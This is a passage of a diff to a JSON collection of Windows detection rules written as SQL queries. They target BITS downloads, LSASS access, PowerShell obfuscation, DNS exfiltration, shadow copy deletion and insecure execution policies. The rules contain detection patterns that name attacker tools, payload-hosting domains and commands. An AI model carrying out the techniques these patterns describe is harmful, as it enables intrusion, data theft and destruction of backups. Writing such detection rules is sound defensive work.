WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_susp_powershell_job.yml" - }, - { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "filename": "posh_ps_invoke_dnsexfiltration.yml" + }, + { + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", - "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", + "status": "experimental", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "title": "Potential PowerShell Obfuscation Using Character Join", + "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_susp_alias_obfscuation.yml" }, { - "title": "USB Device Plugged", - "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "status": "test", - "description": "Detects plugged/unplugged USB devices", - "author": "Florian Roth (Nextron Systems)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1200" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Administrator script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "win_usb_device_plugged.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", - "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "title": "Suspicious Get Information for SMB Share", + "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "status": "test", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_susp_smb_share_reco.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious SSL Connection", + "id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "status": "test", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1573" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Legitimate administrative script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_susp_ssl_keyword.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Disable of ETW 